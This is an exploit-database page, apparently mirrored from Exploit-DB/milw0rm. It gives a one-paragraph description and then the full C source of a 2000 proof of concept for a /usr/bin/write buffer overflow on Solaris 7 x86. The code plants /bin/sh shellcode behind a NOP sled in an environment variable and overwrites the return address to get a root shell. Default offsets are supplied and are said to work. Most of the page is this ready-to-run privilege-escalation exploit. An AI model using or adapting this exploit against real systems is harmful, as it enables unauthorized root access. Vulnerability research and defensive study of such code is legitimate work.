header-logo
Suggest Exploit
vendor:
Solaris
by:
Pablo Sor
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Solaris
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: o:sun:solaris:7
Metasploit:
Other Scripts:
Platforms Tested: Solaris 7 x86
2000

Write Overflow Proof of Concept

This is a proof of concept for a buffer overflow vulnerability in the /usr/bin/write binary on Solaris 7 x86. The vulnerability allows an attacker to execute arbitrary code by overwriting the return address on the stack. The exploit uses a shellcode to spawn a shell with root privileges. It takes two optional command line arguments for the shell offset and return address offset, but the default offsets should work.

Mitigation:

Apply the latest patches provided by the vendor. Avoid running the vulnerable version of the /usr/bin/write binary.
Source

Exploit-DB raw data:

#include <stdio.h>
#include <unistd.h>
/*

  /usr/bin/write overflow proof of conecpt.

  Tested on Solaris 7 x86

  Pablo Sor, Buenos Aires, Argentina. 01/2000
  psor@afip.gov.ar

  usage: write-exp [shell_offset] [ret_addr_offset]

  default offset should work.

*/
long get_esp() { __asm__("movl %esp,%eax"); }

char shell[] =
  "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"
  "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"
  "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"
  "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"
  "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"
  "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"
  "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"
  "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
  "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"
  "\x73\x68\xff\xff\xff\xff\xff\xff\xff"
  "\xff\xff";

  /* shellcode by Cheez Whiz */

void main(int argc,char **argv)
{
  FILE *fp;
  long magic,magicret;
  char buf[100],*envi;
  int i;

  envi = (char *) malloc(1000*sizeof(char));
  memset(envi,0x90,1000);
  memcpy(envi,"SOR=",4);
  memcpy(envi+980-strlen(shell),shell,strlen(shell));
  envi[1000]=0;
  putenv(envi);

  if (argc!=3)
  {
    magicret = get_esp()+116;
    magic = get_esp()-1668;
  }
  else
  {
    magicret = get_esp()+atoi(argv[1]);
    magic = get_esp()+atoi(argv[2]);
  }

  memset(buf,0x41,100);
  buf[99]=0;
  memcpy(buf+91,&magic,4);
  for(i=0;i<22;++i) memcpy(buf+(i*4),&magicret,4);
  execl("/usr/bin/write","write","root",buf,(char *)0);
}


// milw0rm.com [2001-01-25]

Navigation

Suggest Exploit

Services By CQR